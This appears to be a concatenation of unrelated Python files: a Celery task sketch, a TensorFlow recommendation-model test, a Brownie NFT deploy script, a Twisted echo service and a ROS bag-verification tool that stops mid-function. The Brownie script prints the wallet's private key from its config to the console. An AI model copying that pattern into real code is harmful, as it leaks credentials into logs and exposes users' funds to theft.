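# A minimal sketch (not part of this configuration) of the autodiscovered
# ``tasks`` module that the beat schedule above expects. Only the task name
# "parse_log" comes from the schedule; the import path, module layout and task
# body are assumptions, and the exact file location depends on how
# ``autodiscover_tasks`` resolves the ``tasks`` package.
#
#   # tasks.py
#   from celery_config import celery_app   # hypothetical import path
#
#   @celery_app.task(name="parse_log")
#   def parse_log():
#       """Invoked by celery beat every 30 seconds per the schedule above."""
#       ...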
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests NCF."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
# Test with no duplicate items
predictions = np.array([
[1., 2., 0.], # In top 2
[2., 1., 0.], # In top 1
[0., 2., 1.], # In top 3
[2., 3., 4.] # In top 3
])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items. In the MLPerf case, we treat the duplicates as
# a single item. Otherwise, we treat the duplicates as separate items.
predictions = np.array([
[1., 2., 2., 3.], # In top 4. MLPerf: In top 3
[3., 1., 0., 2.], # In top 1. MLPerf: In top 1
[0., 2., 3., 2.], # In top 4. MLPerf: In top 3
[3., 2., 4., 2.] # In top 2. MLPerf: In top 2
])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items, where the predictions for the same item can
# differ. In the MLPerf case, we should take the first prediction.
predictions = np.array([
[3., 2., 4., 4.], # In top 3. MLPerf: In top 2
[3., 4., 2., 4.], # In top 3. MLPerf: In top 3
[2., 3., 4., 1.], # In top 3. MLPerf: In top 2
[4., 3., 5., 2.] # In top 2. MLPerf: In top 1
])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
# We cannot set use_while_loop = True in the flagsaver constructor, because
# if the flagsaver sets it to True before setting use_estimator to False,
# the flag validator will throw an error.
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
|
#!/usr/bin/python3
from brownie import AdvancedCollectible, accounts, network, config
from scripts.helpful_scripts import fund_advanced_collectible
def main():
print(config["wallets"]["from_key"])
dev = accounts.add(config["wallets"]["from_key"])
print(network.show_active())
# publish_source = True if os.getenv("ETHERSCAN_TOKEN") else False # Currently having an issue with this
publish_source = False
advanced_collectible = AdvancedCollectible.deploy(
config["networks"][network.show_active()]["vrf_coordinator"],
config["networks"][network.show_active()]["link_token"],
config["networks"][network.show_active()]["keyhash"],
{"from": dev},
publish_source=publish_source,
)
fund_advanced_collectible(advanced_collectible)
return advanced_collectible
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
import twisted
from twisted.python import log, usage
from twisted.application.service import MultiService
from echoservice import EchoService
class AppService(MultiService):
"""
Our application service hierarchy.
"""
def startService(self):
# create WebSocket echo service and make it a child of our app service
svc = EchoService(self.port, self.debug)
svc.setName("EchoService")
svc.setServiceParent(self)
MultiService.startService(self)
class Options(usage.Options):
optFlags = [['debug', 'd', 'Emit debug messages']]
optParameters = [["port", "p", 8080, "Listening port (for both Web and WebSocket) - default 8080."]]
def makeService(options):
"""
This will be called from twistd plugin system and we are supposed to
create and return our application service.
"""
# create application service and forward command line options ..
service = AppService()
service.port = int(options['port'])
service.debug = options['debug']
return service
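# A minimal sketch (not part of this module) of how the service above is
# typically exposed to ``twistd`` through the plugin system. The module path
# ``appservice`` and the tap name ``echo`` are assumptions for illustration;
# the IPlugin/IServiceMaker pattern itself is standard Twisted.
#
#   # twisted/plugins/echo_plugin.py
#   from zope.interface import implementer
#   from twisted.plugin import IPlugin
#   from twisted.application.service import IServiceMaker
#   from appservice import Options, makeService
#
#   @implementer(IServiceMaker, IPlugin)
#   class EchoServiceMaker(object):
#       tapname = "echo"                      # run with: twistd -n echo --port 8080
#       description = "WebSocket echo service"
#       options = Options
#
#       def makeService(self, options):
#           return makeService(options)
#
#   serviceMaker = EchoServiceMaker()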
|
#!/usr/bin/env python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import collections
import glob
import logging
import logging.handlers
import mmap
import os
import pprint
import re
import sys
import threading
import rosbag
import rospkg
from topic_bag_checker import TopicBagChecker
from topic_connection import TopicConnection
from verification_report import VerificationReport
# Instance of rospkg.RosPack to find ros packages
ROS_PACK = rospkg.RosPack()
PKG_DIR = ROS_PACK.get_path('ddr_data_recorder')
SCRIPTS_PATH = os.path.join(PKG_DIR, 'scripts')
sys.path.insert(1, SCRIPTS_PATH)
import util # pylint: disable=wrong-import-position
## @vars Stores program options
FLAGS = None
## @vars The list of topics not to verify
ILLEGAL_TOPICS = [
'/your/topic'
]
## @vars The list of topics which require a
# special message key comparison function
SPECIAL_TOPICS = [
'/your/topic'
]
# The main logger for the file
_LOGGER = None
# The lock for creating the logger
_LOGGER_LOCK = threading.Lock()
# Named tuple representing a key of a particular message
MessageKey = collections.namedtuple(
'MessageKey', ['seq', 'secs', 'nsecs'])
# Named tuple representing a key of /tf messages
TransformKey = collections.namedtuple(
'TransformKey', ['seq', 'secs', 'nsecs', 'child_frame_id'])
CURRENT_REPORT = None
## Add positional arguments to parser.
# Positional arguments are required and do not use a unique identifier to
# identify them, instead they are differentiated based on their position
# within the command.
# @param parser The ArgumentParser object to add the positional arguments to
# @returns None
def add_positional_arguments(parser):
parser.add_argument(
'directories',
metavar='directory',
nargs='+',
help='Directories of bag files to postprocess'
)
## Add optional arguments to parser.
# Optional arguments are not required and use a unique identifier to
# identify them.
# @param parser The ArgumentParser object to add the optional arguments to
# @returns None
def add_optional_arguments(parser):
parser.add_argument(
'-d', '--debug',
help=argparse.SUPPRESS,
action="store_const",
dest="log_level",
const=logging.DEBUG
)
parser.add_argument(
'-v', '--verbose',
help='Enables verbose mode',
action="store_const",
dest="log_level",
const=logging.INFO,
)
parser.add_argument(
'-t', '--tolerance',
type=int,
default=10,
metavar='T',
help='The tolerance to decide if a gap is missing data, ' \
'or a different publisher'
)
parser.add_argument(
'--log-name',
default='verify_data.log',
metavar='NAME',
help='The name of the log files'
)
parser.add_argument(
'--log-dir',
default=util.clean_directory_name('~/ddr_bags/verify_data_logs/'), # pylint: disable=no-member
metavar='DIR',
help='The directory to store the verify data log files in'
)
parser.add_argument(
'--num-logs',
type=int,
default=10,
metavar='NUM',
help='The number of log files to keep'
)
parser.add_argument(
'--log-size',
type=int,
default=1000000,
metavar='B',
help='The size of each log file in bytes ' \
'before generating a new log file'
)
parser.add_argument(
'--kml-path',
metavar='PATH',
help='The path to the kml file to use for verification'
)
parser.set_defaults(log_level=logging.WARNING)
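# Example invocation (the script name and paths below are illustrative only):
#   python3 verify_data.py -v -t 10 --kml-path ~/maps/route.xml ~/ddr_bags/capture_01
# where -t/--tolerance is the sequence-number gap used to decide whether a jump
# in a topic's messages is missing data or a second publisher on that topic.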
## Parse all positional arguments and options.
# Parse the positional arguments and options specified into the global FLAGS
# variable and store unknown arguments into a new argv to pass to main.
# @param argv An argument vector to parse
# @returns A new argv for use in main
def parse_args(argv):
global FLAGS #pylint: disable=global-statement
# Argument parser from argparse
parser = argparse.ArgumentParser()
# Add all of the positional arguments
add_positional_arguments(parser)
# Add all of the optional arguments
add_optional_arguments(parser)
# Parse the arguments into FLAGS and argv
FLAGS, _argv = parser.parse_known_args(argv)
return _argv
## Get the main logger.
# Get the main logger or create a main logger if one does not exist
# @returns The main logger
def get_logger():
global _LOGGER #pylint: disable=global-statement
# Check if the logger has already been created
if not _LOGGER:
# Get a logger and name it
logger = logging.getLogger('main')
# Set the logging level for the current program
logger.setLevel(logging.DEBUG)
# Clean user input and make sure the directory exists
log_dir = util.clean_directory_name(FLAGS.log_dir) # pylint: disable=no-member
util.ensure_directory_exists(log_dir) # pylint: disable=no-member
# Clean user input and get just the name
if FLAGS.log_name.endswith('/'):
log_name = os.path.dirname(FLAGS.log_name)
else:
log_name = os.path.basename(FLAGS.log_name)
# Add the output handler.
_file_handler = logging.handlers.RotatingFileHandler(
os.path.join(log_dir, log_name),
maxBytes=FLAGS.log_size,
backupCount=FLAGS.num_logs
)
_file_handler.setFormatter(logging.Formatter(
fmt='%(asctime)s.%(msecs)03d %(message)s',
datefmt='%Y_%m_%d %H:%M:%S'
))
_file_handler.setLevel(logging.DEBUG)
logger.addHandler(_file_handler)
# Add the output handler.
_handler = logging.StreamHandler(sys.stdout)
_handler.setFormatter(logging.Formatter(fmt='%(message)s'))
_handler.setLevel(FLAGS.log_level)
logger.addHandler(_handler)
# Get a lock on the logger
with _LOGGER_LOCK:
# Set the global logger
_LOGGER = logger
return _LOGGER
## Determine if a message is valid
# Determine if a message is valid to be used for indexing
# in an old bag
# @param value The bag message to verify
# @returns Bool True if the message is valid for use in indexing in an old bag
def is_valid(value):
if value.topic not in ILLEGAL_TOPICS:
# Message must have a header field
# This is how to check for a header according
# to the ROS Cookbook and it's twice as fast
# as hasattr(value.message, 'header') so ¯\_(ツ)_/¯
if value.message._has_header: # pylint: disable=protected-access
return True
return False
## Get the key from a bag message
# Gets the unique key for a message from a bag
# @param bag_message The bag message to get the unique key for
# @returns collections.namedtuple MessageKey or TransformKey that represents
# the unique key value of the bag message
def get_message_key(bag_message):
logger = get_logger()
key = None
# Skip illegal topics
if bag_message.topic not in ILLEGAL_TOPICS:
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
key = bag_message.message.data
# Handle /special topic
# use this template to create a handler for topics that have weird data vars
elif bag_message.topic == '/special':
transform = bag_message.message.transforms[0]
key = TransformKey(transform.header.seq,
transform.header.stamp.secs,
transform.header.stamp.nsecs,
transform.child_frame_id)
# ***********************************
elif is_valid(bag_message):
# Message key is a tuple of the sequence number and timestamp
# from the header of the message
key = MessageKey(bag_message.message.header.seq,
bag_message.message.header.stamp.secs,
bag_message.message.header.stamp.nsecs)
else:
logger.info('No handler for topic %s', bag_message.topic)
logger.debug('message: %s\n', bag_message.message)
return key
## Handle comparison of the special case /andBeyond topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int The value of the comparison between current_key and key
def and_beyond_handler(current_key, key):
diff = current_key - key
if diff > 0:
return diff
return None
## Handle comparison of the special case /special topic
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns Bool The value of the comparison between current_key and key
def special_handler(current_key, key):
key_is_good = False
if current_key.secs - key.secs > 0:
key_is_good = True
elif current_key.secs - key.secs == 0:
if current_key.nsecs - key.nsecs > 0:
key_is_good = True
return key_is_good
## Compares keys of messages, calling the special case handlers if needed
# @param bag_message The message from the bag
# @param current_key The key of the current message to compare
# @param key The key stored in the list of previous keys to compare against
# @returns int, Bool, or None The value of the comparison between
# current_key and key
def compare_keys(bag_message, current_key, key):
logger = get_logger()
# Skip illegal topics
if bag_message.topic in ILLEGAL_TOPICS:
logger.debug('Illegal topic: %s', bag_message.topic)
return None
ret_val = None
# Handle /ddr/andBeyond topic
if bag_message.topic == '/ddr/andBeyond':
ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
            if not special_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the path to the kml file
# Gets the path to the kml file using the kml-file command line argument first.
# If no command line parameter is found or it is invalid, it looks for a kml
# file in the directory that is currently being processed. If there is still no
# kml file found, the final place checked is in the ddr_data_recorder package
# @param directory The current directory being verified
# @returns list The paths to candidate kml files (empty if none are found)
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
            FLAGS.kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the paths to the markdown files
# Gets the paths to all markdown files in the current directory.
# @param directory The current directory being verified
# @returns list The paths to the markdown files (empty if none are found)
def get_markdown_paths(directory):
    markdown_paths = glob.glob(os.path.join(directory, '*.md'))
    if markdown_paths:
        return markdown_paths
    logger = get_logger()
    logger.info('No markdown files found in "%s"', directory)
    return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
search_result = re.search(
br'## Hash of Used XML file \(md5\): (?P<hash>[0-9a-f]{32})',
markdown_file
)
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
## Verifies that the hash of a kml file matches the hash recorded in a markdown
# file
# @param kml_paths The list of candidate kml files to verify
# @param markdown_paths The list of markdown files to read the recorded hash from
# @returns (Bool, String) Whether a matching hash was found, and the chosen kml path
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
